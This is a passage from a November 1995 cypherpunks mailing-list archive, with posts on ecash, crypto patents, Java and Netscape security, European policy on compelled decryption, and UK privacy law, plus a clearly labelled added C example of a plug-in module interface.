Subject: Re: Java & Netscape security [NOISE]
In-Reply-To: <v02120d00acd1aa2c9cf1@[205.139.212.66]>
Message-ID: <Pine.SOL.3.91.951116225922.14202B-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Fri, 17 Nov 1995 09:15:46 +0800
To: cypherpunks@toad.com
Subject: Re: Public Domain?
Message-ID: <v01510103acd15b8b72af@[193.74.216.47]>
MIME-Version: 1.0
Content-Type: text/plain




>But the researchers backed out of the idea on the advice of our patent
>lawyers.  The reasoning goes like this:  Sending anything over the Internet
>is equivalent to placing it into the public domain, since the message can
>be viewed by other than the intended recipient.  So, proprietary
>information *even encrypted* will be rendered unpatentable if sent over the
>Internet.
>

You may want to send these guys back to do their homework.  For corporate
communications, crypto is not new.  Messages have been sent in cipher over
telegraph lines since the civil war.  Ask if a trade secret becomes exposed
(in the legal sense) if it is transmitted over telegraph lines in code.

I fail to see what the difference is between enciphering something in dots
and dashes and enciphering it in 1's and 0's.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 17 Nov 1995 15:23:26 +0800
To: bryce@colorado.edu
Subject: Re: Mark Twain Bank ecash scripts needed
Message-ID: <199511170707.XAA07527@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:25 PM 11/16/95 -0700, Bryce wrote:
>I am in the process of setting up a shop using Mark Twain Bank
>Ecash.  Could someone please forward me the scripts to accept Ecash
>(running on SunOS.  On c2.org actually) and/or any advice you have

http://www.digicash.nl/mt/
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 17 Nov 1995 13:11:28 +0800
To: cypherpunks@toad.com
Subject: Re: e$: Mandarins, Lifers, and Talents
Message-ID: <v02120d0eacd1b471dc1d@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>It really did not happen because of cheerleaders. This is a recurring
>belief of mine, notably in my occasional interactions with the nanotech
>community, as a few members of this list can attest to. The "Rah, Rah"s--no
>pun intended--play a minor role in adoption of new products and
>technologies.

Tim, you can't tell me that there weren't people who were just plain fired
up about the prospects for any really serious technology. Where are you
living, the Gernsback Continuum? Tim, those "cheerleaders" are the ones who
either get fired up to do something themselves, or if they can't, they get
people either fired up to buy stuff, or fired up to build stuff. Howard
Hughes was one. Hell, the Wright brothers were. So are you, Tim, only your
passion is strong crypto and cryptoanarchy. Mine is this geodesic market
stuff...


>One argument I am never persuaded by is the hackerish "Feh." (Does anybody
>but hackers use this strange word?)

Ah. Well, Tim, "Feh" is yiddish, actually. Just like "hacker" comes from
electric trains. If you don't believe me on *that* one, ask Mr. Levy, who
knows all about the MIT Model Railroading Club...

>In any case, I'm not interested in "doing better than that." My support for
>Chaumian e-cash goes back to 1987. As to why I didn't sign up for Magic
>Money, or E-Purse, or Digibux, or whatever, well, I'm not a merchant. Just
>as one could study flight, to use Bob's example, without operating a
>passenger service or a flying school, so one can be interested in digital
>cash without "opening an account."

Right on, Tim. Just don't rain on my parade, or anyone else who's trying to
make something happen, for that matter.


>Ah, but I never claimed otherwise (perhaps this is what you mean by "your
>nonexistent point"). My point was only that digital cash will happen mostly
>when it fills a need, or is accepted by customers, not by cheerleading and
>by urging people on this list to be pioneers.

Cart before the horse, Tim. Most of the new people (say, for 2 years at
least) on this list *are* pioneers. I've got 600 people over on www-buyinfo
who are there primarily because 90% (!) of the traffic on it is my
e$-filtered cross-posts from cypherpunks, and I don't know how many are
over here because they like their whiskey neat. Those people are so fired
up, they will find a need, or *create* one, if they have to.

>The theories about mandarins, lifers, and talents I'll discuss at another
>time, maybe. All I'll say is that I think it's too simple a categorization.
>Maybe it's a Boston viewpoint.

Damn Yankees. Born in El Paso, myself, by way of St. Thomas, Las Cruces,
Corpus Christi, El Paso, Anchorage, St. Louis, Mid-MO, Chicago, and yes,
Boston. Never knew I was one until you told me...

>The folks I've worked with over the years
>bear almost no resemblance to any of these categories.

Typical Mandarin response. ;-). (just pulling your leg, Tim. Put the Glock
*down*...)

>In any case, people
>will start using digital cash if and when it fulfills some need, or some
>need they never knew they had, gets stimulated.

Agreed.

>
>On a personal note--which is weird, since 1000 or more people may be
>reading this message, though most probably haven't read this far--I think
>it best not to get too emotionally attached to some particular outcome in
>the introduction of a new technology.

I bet they are, but I'm not attached to Mark Twain or even Digicash per se.
It just seems to me, that if you want to get involved in this flying stuff,
here's a plane that flies, even if its elevators are stuck on the front.
Learn to fly now, and be able to fly the new stuff as it becomes available.
If you want to fly, that is. Some people then couldn't help it. They *had*
to do it. That's what's happening here, Tim.

>I've seen many "prophets" wailing to the world that their
>visions _deserve_ success.

Not here Tim. I believe you might be projecting, or something. I just want
to sell stuff for cash on the net. Then, I want to surfact the financial
markets into little tiny pieces...

>The technologies which hit the right chord rarely need, or benefit from,
>the "evangelists" and "cheerleaders." The Macintosh did not need Guy Kawasaki or
>any of the other so-called evangelists to succeed. The microprocessor did
>not need evangelists. The airplane did not. The VCR did not. The cellular phone
>did not.

I don't believe that for a minute, and on reflection, you probably don't
either. Jerry Sanders at AMD. Hell, Tim, you knew Moore, for god's sake.
Think about, oh, the Sony guy, whatever his name is, Morita. The people who
built the Mac were *possessed*. So was Kawasaki. I'm *still* possessed.
What about the *entrepreneur's* reality distortion field. I bet you've seen
more than a few, and probably more than a few who were right, or you
wouldn't be thrashing your Mac on the net and clipping coupons...


>And I can think immediately of several
>technologies that had active proselytizers--Ted Nelson, Doug Engelbart,
>Marty Lepselter, Steve Jobs, Eric Drexler, fusion enthusiasts, space
                                                                ^^^^^
>enthusiasts--but in which progress has been stalled or proceeded along
^^^^^^^^^^^^
>different paths for different reasons.

I resemble that remark. Sure, Tim some of them didn't make it. But for
every one of those (strange you should mention Jobs, right after I mention
the reality distortion field, and don't count him out yet, rumor has it
Ellison wants him to run Apple when Oracle buys it, god help us all), there
are others who did exactly that. Von Braun, or Porsche, or, hell, all I can
think of are Germans, uh, okay, Bill Gates.

>This is a very interesting area for me, and I used to write extensively
>about it. Nick Szabo and I had several debates about this, a couple of
>years ago. However, no time now to discuss the full implications here.

Having been hammered by Nick myself, once or twice, I think I understand this...

So. I'm enthused. My enthusiasm is demonstrably contagious. If someone gets
enthusiastic about all this on my account, and puts up the king-hell,
world-beater, financial-cryptography-killer-ap that's cool by me.
Otherwise, it's only bandwidth, which I've wasted enough on for this
thread. If you want to make the rubble bounce, go for it.

Besides, I usually stay in my cage, these days. Which is where I'm going to
go and lurk for another month or so...

Cheers,
Bob Hettinga

PS: Feh

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 17 Nov 1995 18:46:12 +0800
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <199511170734.XAA12528@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:13 PM 11/16/95 -0600, Scott Brickner wrote:
>The problem is that the non-encryption program must use the same
>interface as the encryption program.  Text compression is often cited
....
>You'd need a program which not only *accepted* the additional parameter,
>but also *needed* the second parameter.  I confess I have some difficulty
>thinking of one.

If you support user-specified program/module interfaces which take
arbitrary string-valued arguments (e.g. Unix-style stuff or objects),
and you've got negotiation methods that can accept args,
then you've got a very general system which they shouldn't
be able to argue with - so the drop-in authors can hand the keys around
as 0xHEX-strings rather than bignums without the program needing to know.
Sorting and backup systems often want lots of options.

If you decide for reliability reasons to insist on registered module names,
to prevent problems like six different sorting modules with different
argument orders, or backup modules with different ideas of "original" and "copy"
(switching those two can be _Very_ annoying!), then there's even a mechanism
for the crafty foreigner to distribute modules and documentation!

>> An abstract set of open/modify/close
>> routines (where open returned a pointer to opaque state, say a session
>> key :) would be fine.

#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281
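
[Added example, not part of the original posts or of any program discussed in them.] The interface sketched in this message and in Mark Grant's earlier one (registered module names, open/modify/close with opaque state, string-valued arguments) can be written so that the host runs identical code for every module. All names below are hypothetical, and the "xor" module is a toy stand-in for a module that needs a key, not a real cipher.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Host-side view of a drop-in module (all names here are hypothetical):
 * open() takes an uninterpreted argument string and returns opaque state. */
typedef struct {
    const char *name;                      /* registered module name */
    void *(*open)(const char *args);       /* NULL if args are rejected */
    long  (*modify)(void *st, const unsigned char *in, size_t n,
                    unsigned char *out, size_t cap); /* bytes out, or -1 */
    void  (*close)(void *st);
} module_t;

/* Module 1: run-length encoder. Args: "max=<1..255>" (longest run emitted). */
typedef struct { unsigned max_run; } rle_state;

static void *rle_open(const char *args) {
    unsigned m = 0;
    if (!args || sscanf(args, "max=%u", &m) != 1 || m < 1 || m > 255)
        return NULL;
    rle_state *s = malloc(sizeof *s);
    if (s) s->max_run = m;
    return s;
}

static long rle_modify(void *st, const unsigned char *in, size_t n,
                       unsigned char *out, size_t cap) {
    rle_state *s = st;
    size_t o = 0;
    for (size_t i = 0; i < n; ) {
        size_t run = 1;
        while (i + run < n && in[i + run] == in[i] && run < s->max_run)
            run++;
        if (o + 2 > cap) return -1;        /* output buffer too small */
        out[o++] = (unsigned char)run;     /* (count, byte) pairs */
        out[o++] = in[i];
        i += run;
    }
    return (long)o;
}

/* Module 2: toy repeating-key XOR. Args: "key=0x<hex>", the key handed
 * around as a hex string exactly as the message suggests. */
typedef struct { unsigned char key[32]; size_t klen, pos; } xor_state;

static int hexval(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

static void *xor_open(const char *args) {
    if (!args || strncmp(args, "key=0x", 6) != 0) return NULL;
    const char *h = args + 6;
    size_t len = strlen(h);
    if (len == 0 || len % 2 != 0 || len / 2 > 32) return NULL;
    xor_state *s = calloc(1, sizeof *s);
    if (!s) return NULL;
    for (size_t i = 0; i < len; i += 2) {
        int hi = hexval(h[i]), lo = hexval(h[i + 1]);
        if (hi < 0 || lo < 0) { free(s); return NULL; }
        s->key[s->klen++] = (unsigned char)((hi << 4) | lo);
    }
    return s;
}

static long xor_modify(void *st, const unsigned char *in, size_t n,
                       unsigned char *out, size_t cap) {
    xor_state *s = st;
    if (n > cap) return -1;
    for (size_t i = 0; i < n; i++)
        out[i] = (unsigned char)(in[i] ^ s->key[s->pos++ % s->klen]);
    return (long)n;
}

/* Registry of module names; the host knows nothing else about them. */
static const module_t registry[] = {
    { "rle", rle_open, rle_modify, free },
    { "xor", xor_open, xor_modify, free },
};

/* The whole host: look up by name, pass args through, run, clean up.
 * Returns bytes written, or -1 for unknown module, bad args or overflow. */
long run_module(const char *name, const char *args,
                const unsigned char *in, size_t n,
                unsigned char *out, size_t cap) {
    for (size_t i = 0; i < sizeof registry / sizeof registry[0]; i++) {
        if (strcmp(registry[i].name, name) != 0) continue;
        void *st = registry[i].open(args);
        if (!st) return -1;
        long r = registry[i].modify(st, in, n, out, cap);
        registry[i].close(st);
        return r;
    }
    return -1;
}

int main(void) {
    unsigned char out[32];
    const unsigned char *msg = (const unsigned char *)"aaaab"; /* constructed input */
    printf("rle wrote %ld bytes\n", run_module("rle", "max=3", msg, 5, out, sizeof out));
    printf("xor wrote %ld bytes\n", run_module("xor", "key=0x0102", msg, 5, out, sizeof out));
    return 0;
}
```

Nothing in run_module() distinguishes the module that needs a key from the one that needs a compression setting; both arrive as an argument string the host never parses.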






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 17 Nov 1995 18:46:16 +0800
To: cypherpunks@toad.com
Subject: COMMUNITY CONNEXION BECOMES FIRST INTERNET PROVIDER TO ACCEPT ECASH
Message-ID: <199511170805.AAA10143@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


For Immediate Release - November 17, 1995
Contact: Sameer Parekh sameer@c2.org 510-601-9777

COMMUNITY CONNEXION BECOMES FIRST INTERNET PROVIDER TO ACCEPT ECASH

Community ConneXion today announced that it has become the first and
only Internet Service Provider in the world to allow for payment using
ecash, a digital cash system developed by DigiCash bv, of Amsterdam,
Holland, released jointly with Mark Twain Bank, of St. Louis,
Missouri.

On October 23rd, DigiCash bv announced jointly with Mark Twain Bank
that they would be issuing ecash denominated in real U.S. Dollars. In
the past DigiCash had been running a trial "CyberBucks" payment
system, which was not backed by any strong currency; it was a form of
"Monopoly Money". 

The ecash system provides full payor anonymity. Consumers can use
ecash tokens to pay for goods on the Internet, with full anonymity
from the merchants. This lets consumers buy things without fear of
merchants compiling and selling databases of their spending habits. It
also allows for a convenient and safe mechanism for payment through
the Internet.

Sameer Parekh, President of Community ConneXion, said that ecash is a
significant improvement over the payment systems widely in use on the
net today. He described one example, "Currently people usually just
send their credit card numbers over the net to the merchant if they
want to buy something. This opens up the security risk of having the
merchant's computers broken into; every consumer's full credit limits
are then subject to attack. With ecash, only the limited sums that
have been spent are at risk."

Community ConneXion has begun accepting ecash as payment for its
services, offering a five percent discount for customers who pay with
ecash. "It simplifies our accounting and protects the privacy of our
clients; it is to everyone's benefit to use ecash," said Parekh.
"Ecash has greatly simplified account creation procedures for our
anonymous accounts. In the past someone creating an anonymous account
would need to wait until their payment arrived, and their check
cleared, before the account could be created; now, the account is
created automatically, immediately after the ecash payment is made
over the world-wide-web."

Community ConneXion is the leading provider of privacy on the
Internet. They provide anonymous and pseudonymous internet access and
web pages in addition to powerful web service, virtual hosts, and web
design consultation. Information is available from their web pages at
http://www.c2.org/. Information about the Mark Twain Bank ecash
release is available from http://www.marktwain.com/ecash.html.

DigiCash, CyberBucks, and ecash are trademarks of DigiCash bv. Mark
Twain Bank is a trademark of Mark Twain Bancshares. Monopoly is a
trademark of Parker Brothers, Division of Tonka Corporation.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 17 Nov 1995 17:17:12 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199511160333.WAA08987@jekyll.piermont.com>
Message-ID: <30AC4F87.7BDB@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Matthew James Sheppard wrote:
> I've got to note just one thing -- what about the Netscape LiveScript
> language?  is it opening up the same security can of worms as java?  I
> realise that it provides functionality specific to browsing only (no
> network/files) but the potential for bugs when you add another
> language must increase.

  One advantage that livescript has is that it was designed and
implemented by one individual, removing communication problems
as a possible source of holes.

  We are reviewing the set of reflected objects for possible security
problems, and will be taking a conservative approach to what we
include.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Sat, 18 Nov 1995 16:32:04 +0800
To: cypherpunks@toad.com
Subject: SA: Confidential Communication on the Internet
Message-ID: <Pine.SUN.3.90.951117010848.21461A@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


In the December issue of Scientific American there is an article
by Thomas Beth, "Confidential Communication on the Internet".
Lite on the technical side but good reading anyway.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Fri, 17 Nov 1995 18:01:29 +0800
To: cypherpunks@toad.com
Subject: Ecash account
Message-ID: <199511170930.CAA00682@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


So who here is going to use their ecash account to set up a money
lau^H^H^Hexchange service?
 
Ob Cyphernoise: Would Dr Fred, Alice, and any other names LD has set up
for himself lately please keep the noise limited to email? Please?
 
Ob Plonk: amen. So let it be written, so let it be plonked.
 
Don




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Fri, 17 Nov 1995 18:46:51 +0800
To: cypherpunks@toad.com
Subject: No Privacy Right in UK ?
Message-ID: <Pine.BSD.3.91.951117025209.5772G-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
 
                      Cypherpunks assume privacy is a good thing 
                      and wish there were more of it. 
 
                                        --Welcome to cypherpunks 
 
 
 
Friend, 
 
 
11 16 95 The Electronic Telegraph runs a newsstory headed 
 
   Doorstep polish researcher was whiplash injuries spy 
 
 
Here are excerpts from the newsstory: 
 
   Miss [Natalie] Goldner had been hurt when a car in which 
   she was a passenger was hit from behind in April 1988, 
   and she was forced to leave her video library job. 
 
   Shortly after the accident, she started a claim for compensation
   and future loss of earnings against the Royal Insurance Company.

   ...Margot Christie...was working for the Hampshire Detective
   Agency when she went to Miss Goldner's house in October 1991.
 
Christie posed as a market researcher. 
 
   It was only when a compensation claim reached court that
   Miss Goldner realised the "researcher" was a private detective
   hired to discover the extent of her injuries.

   In a report which was due to go before the court, Mrs Christie
   said she had asked Miss Goldner to test some polish and window
   cleaner.
   
   [Christie] returned 11 days later.  "I asked the plaintiff 
   if the polish had given a good shine and if she had rubbed 
   hard. The plaintiff said 'Yes I did, it didn't smear at all'." 
 
Natalie lives with her mother. 
 
   "I felt as though we had been burgled.  I felt violated.  We 
   were so worried afterwards that we just didn't trust anyone 
   who turned up at our door. 
 
   "She asked lots of questions about who did the housework 
   in our house.  We were just chatting away and I had no idea 
   she was there to spy on me." 
 
Natalie settled out of court. 
 
   In September, she accepted a 20,000 [pound] settlement after 
   one day of a planned four-day court hearing. 
 
   She is to lodge a complaint with the Association of British 
   Investigators.... 
 
Fortunately, the Daily Telegraph publicized the case.  The newsstory
points out:
 
   A spokesman for Liberty, the civil rights group, said:  "There 
   is no right to personal privacy in Britain and so it [invasion 
   of privacy by deception] is not against the law." 
 
 
Cordially, 
 
Jim 
 
 
 
NOTE.  The Electronic Telegraph can be accessed at 
 
                 http://www.telegraph.co.uk 
 
 
       The online filename of the above newsstory is: 
 
                        nspys16.html 
 
 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Fri, 17 Nov 1995 12:00:45 +0800
To: cypherpunks@toad.com
Subject: Re: COE Recommendation No. R (95) 13
In-Reply-To: <9511160302.AA17272@www18.w3.org>
Message-ID: <Pine.HPP.3.91.951117024147.26779A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 15 Nov 1995, Phillip M. Hallam-Baker wrote:

> I think the majority of the text is well thought out and very much in
> line with what we would want.

How about this:
________________________________________________________________________
9. Subject to legal privileges or protection, most legal systems permit
investigating authorities to order persons to hand over objects under
their control that are required to serve as evidence. In a parallel
fashion, provisions should be made for the power to order persons to
submit any specified data under their control in a computer system in the
form required by the investigating authority.
________________________________________________________________________

Is this 'what we would want'? It clearly means that one can be ordered
to reveal the password to encrypted data and punished by law if one
refuses. Suppose they suspect you of being a child pornographer and
get a court order to search your encrypted system. You know you are
innocent. Is it acceptable to put you in jail for not giving them access
to your encrypted, very personal diary (in which you describe in detail
your sexual encounters with the wife of the Chief of Police)?

And how about this: 
_______________________________________________________________________
14. Measures should be considered to minimise the negative effects of the
use of cryptography on the investigation of criminal offenses, without
affecting its legitimate use more than is strictly necessary.
_______________________________________________________________________

Is this really just a toothless statement to give to the French?
Couldn't it as easily be interpreted as not wanting to go into
details yet (since no real system is available) but stating that
some form of GAK is on the agenda? Surely, law enforcement
bureaucrats would not consider GAK to affect the 'legitimate
use' of cryptography 'more than is strictly necessary'.

Mats








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Fri, 17 Nov 1995 21:04:51 +0800
To: cypherpunks@toad.com
Subject: Electronic Records in NYS
Message-ID: <199511171239.HAA17717@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain



From another list:
Forwarded message:
Date:         Thu, 16 Nov 1995 09:52:50 -0500
Sender: Computer-assisted Reporting & Research <CARR-L%ULKYVM.BITNET@uga.cc.uga.edu>
From: Ann Marie Przybyla <APRZYBYL@MAIL.NYSED.GOV>
Subject:      Electronic Records User Survey
X-To:         CARR-L@ulkyvm.Louisville.edu
To: Multiple recipients of list CARR-L <CARR-L%ULKYVM.BITNET@uga.cc.uga.edu>

This message is being posted to several lists; please excuse any
duplication

****************************************************************

Colleagues:

The New York State Archives and Records Administration (SARA) has
acquired four significant electronic data sets generated by New
York State agencies, including the Department of Education and
the Department of Correctional Services.  To enhance access to
the data sets, SARA is conducting a survey targeted at
researchers who use machine-readable data and statistical
analysis for their work.

A high level of participation in this survey would be very
helpful. If you would like to participate, please contact:

Ann Marie Przybyla
Electronic Records and Networking Services Unit
New York State Archives and Records Administration
aprzybyl@mail.nysed.gov


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wiltship@iccu6.ipswich.gil.com.au (PeterWiltshire)
Date: Fri, 17 Nov 1995 09:41:46 +0800
To: cypherpunks@toad.com
Subject: Re: Need advice on video
Message-ID: <199511162222.JAA05710@iccu6.ipswich.gil.com.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Ben wrote...

<stuff deleted>
>What I'm fishing for here are any suggestions for ways to present
>some of this content in an interesting video setting.  We've already
>decided on doing some algorithm animation, and maybe some simple
>moving graphics illustrating the various protocols.  Any ideas you
>might have would be appreciated.

Firstly you will need to clearly define for yourself exactly what you want
the audience to know by the end of the programme... the content.  And what
you want them to feel by the end of the programme too.. you obviously want
them to have positive feelings about crypto.  You might also consider some
broader political issues to be cleanly interwoven through the script too.

Then, you might like to think about the WHO, WHEN, WHERE and WHY of crypto.
A bit of an historical background on cyphers would put today's crypto into
context, too.  Make sure that you keep giving the audience enough knowledge
to comprehend stuff you will be presenting towards the end of the video...
all of the information you present needs to build on what you have already
presented.

Closely examine your scripts for jargon.  Take out any that you can't
explain clearly.  Too much jargon can swamp the audience and they will be
distracted from important content while they try to remember what a
particular word means.


>BTW, once we finish this and show it locally, we are considering
>doing some duplication to send out to interested bodies.  Do you
>think there is demand for a good, clear intro to all this in video
>form?
>

I'm sure there is a need for this sort of programme that is produced well
and is reasonably priced.  Remember to get signed releases from EVERYONE
involved in the project, not just ppl on camera, so you can sell the
programme ANYWHERE IN THE WORLD if you choose to.

Don't be misled, I'm sure there are quite a few programmes out there on
this very topic.  Yours needs to be significantly different and
entertaining.  I would suggest you have an opportunity to make a video
from 'the inside', given the ppl on this list and the contacts they have.
A lot of films are good introductions to a subject without standing up and
calling them such... like if I was making a video about Phil I would have
to explain crypto and its use as a way of reaching a level of
understanding for the audience.

Hope this is of some help.


>Thanks,
>-- 
>        eebmoC .L nimajneB | Benjamin L. Combee                (REVERSE) 
>       gro.doowhcet@eebmoc | combee@techwood.org           (ENGINEERING) 
>\eebmoc\ten.kay.www\\:ptth | http://www.yak.net/combee/        (RESERVE)
>


Cheers

Peter








                                             Flight to Quality
                                 Wiltshire Productions Pty Ltd
                              Brisbane, Queensland, Australia
               Intl Voice  61 7 3376 3535  Intl Fax  61 7 3279 4027
              Email wiltship@gil.com.au  PGP Key ID 3E584C7D
  PGP Fingerprint 01 03 FB F4 BE F8 2B F3 5D 84 6B 69 37 80 FE 10





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Fri, 17 Nov 1995 21:59:29 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Java & Netscape security (reply to misc. postings)
In-Reply-To: <199511170439.UAA19926@netcom17.netcom.com>
Message-ID: <199511171345.IAA19681@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain



> 
> After reading http://java.sun.com/1.0alpha3/doc/security/security.html my
> (possibly faulty) understanding of Java security is that it will not allow
> an applet to speak to IP addresses other than the one it was loaded from. 
> I have a question:

FYI.

According to an interview I did with Sun, inter-applet communication, btw,
can only occur between applets from the same IP address, same domain name
and on the same page...

/hawk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 18 Nov 1995 01:57:27 +0800
To: cypherpunks@toad.com
Subject: Corrections about Bob Noyce and Intel
Message-ID: <acd204fa000210047be5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:55 PM 11/17/95, attila wrote:

>   2.  most were pioneers: a specific example is Bob Norris who walked
>       out of a Fairchild board meeting being rejected for his
>       eighth try at replacing Germanium because the first seven had
>       failed. A couple of VCs, among them Arthur Rock and Bob Perring
>       said: "...we believe you, let's try silicon..." and we have Intel.

Bob Noyce was already making silicon devices at Fairchild. The "planar
process" was developed by him in the late 50s. It is not the case that
Fairchild was stuck making germanium, nor that Intel was the first to use
silicon. I could go on about the actual history, but this is far from the
themes of this list, and many books cover the history very well.

What Intel pioneered the development of was _silicon-gate MOS_, where the
aluminum gates of traditional silicon devices are replaced with polysilicon
gates. Intel did this by hiring the silicon-gate gurus from Fairchild
(Vadasz, Grove, Faggin, etc.).

>       But, who drives Intel today? --Grove, who is labelled as the
>       founder.  Grove made the _business_ -the brains have been
>       forgotten. Norris was the darling of the VCs for a couple years
>       until they figured he couldn't spot a _financial_ success.

Grove remains a technologist--I studied semiconductor physics from his
wonderful 1967 book, "The Physics and Technology of Semiconductor
Devices"--and the group that leads Intel is highly technical. Gordon Moore
remains connected, materials scientist Craig Barrett (who hired me into
Intel in '74, ironically) is next-in-line to be President, Gerry Parker is
a top technologist, and so on.

As to Bob Noyce being the "darling of the VCs for a couple of years until
they figured he couldn't spot a _financial_ success," I should just let
that one pass. Noyce of course has been dead for several years. When he was
alive, though, he "spotted" several financial successes.

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: grdawe@toad.com
Date: Sat, 18 Nov 1995 02:42:52 +0800
To: cypherpunks@toad.com
Subject: RE: nnets & crypto
Message-ID: <Chameleon.951117113552.gweissma@altonet.com>
MIME-Version: 1.0
Content-Type: text/plain




IMHO etc., *any* time there is an application involving pattern-matching
and analysis of complex in->out relations/functions there is a possible
application of NN's.  That's not to say that a particular application
would be a panacea, but designed properly I think an NN could be of value
in differential crypto, discovering crypto-weak (i.e. strong) correlations
between in->out, etc.  My intuition says there is or can be value as a
tool for the cryptanalyst.

I would also not discount the use of NN's in ENcrypting, given the
capability of NN's realizing (almost) any arbitrary, nonlinear function
from in->out.

Caveat: practical considerations not accounted for in these opinions.



>Date: Fri, 10 Nov 1995 11:52:41 -0800
>From: Bill Stewart <stewarts@ix.netcom.com>
>Subject: Re: coding and nnet's

>Schneier's 2nd edition says "Neural nets aren't terribly useful for
>cryptography, primarily because of the shape of the solution space.

>Neural nets work best for problems that have a continuity of
>solutions, some better than others. This allows a neural net to
>learn, proposing better and better solutions as it does. Breaking an
>algorithm provides for very little in the way of learning
>opportunities: You either recover the key or you don't. (At least
>this is true if the algorithm is any good.)

Has anyone tried using neural nets or similar techniques for
searching for useful nonrandom properties of the round functions of
block ciphers or hash functions?  This might be useful in trying to
prepare some new kind of attack, find a balanced binary function
that is useful in using the generalization of linear cryptanalysis
discussed by Harpes, Kramer, and Massey at Eurocrypt '95, find a
better "difference" function for use in a differential attack, etc.

>Neural nets work well
>in structured environments when there is something to learn, but not
>in the high-entropy, seemingly random world of cryptography." And he
>doesn't give any references.

Merkle's paper on Khufu and Khafre addresses this idea, I think.
Merkle comments that it's not going to be useful against a full
cipher, but that it might be useful against (say) Khufu with one or
two octets.

>#				Thanks;  Bill
># Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
># Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

Note:  Please respond via e-mail as well as or instead of posting,
as I get CP-LITE instead of the whole list.

   --John Kelsey, jmkelsey@delphi.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 17 Nov 1995 23:53:13 +0800
To: pcw@access.digex.net
Subject: Cornell Cracks Down on Private E-MAIL...
Message-ID: <199511171522.KAA11733@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by pcw@access.digex.net (Peter Wayner) on 
